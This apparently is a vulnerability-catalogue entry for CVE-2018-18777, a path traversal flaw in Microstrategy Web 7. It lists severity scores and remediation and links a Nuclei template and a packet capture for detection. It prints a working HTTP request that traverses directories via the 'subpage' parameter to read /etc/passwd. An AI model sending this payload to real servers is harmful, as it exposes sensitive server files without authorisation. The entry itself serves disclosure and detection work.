🔙 목록으로 돌아가기

CVE-2018-18777: Microstrategy Web 7 - Local File Inclusion

TitleMicrostrategy Web 7 - Local File Inclusion
Author0x_Akoko
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
RemediationApply the latest security patches or upgrade to a newer version of Microstrategy Web.
CVSS Score4.3
EPSS Score0.69525
CVE IDCVE-2018-18777
CWE IDCWE-22
Tags cve cve2018 traversal edb packetstorm microstrategy lfi vuln

🔍 Vulnerability Description

Microstrategy Web 7 is vulnerable to local file inclusion via “/WebMstr7/servlet/mstrWeb” (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.

🌐 HTTP Request

GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.1) Gecko/20100101 Firefox/65.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-18777.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-18777.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A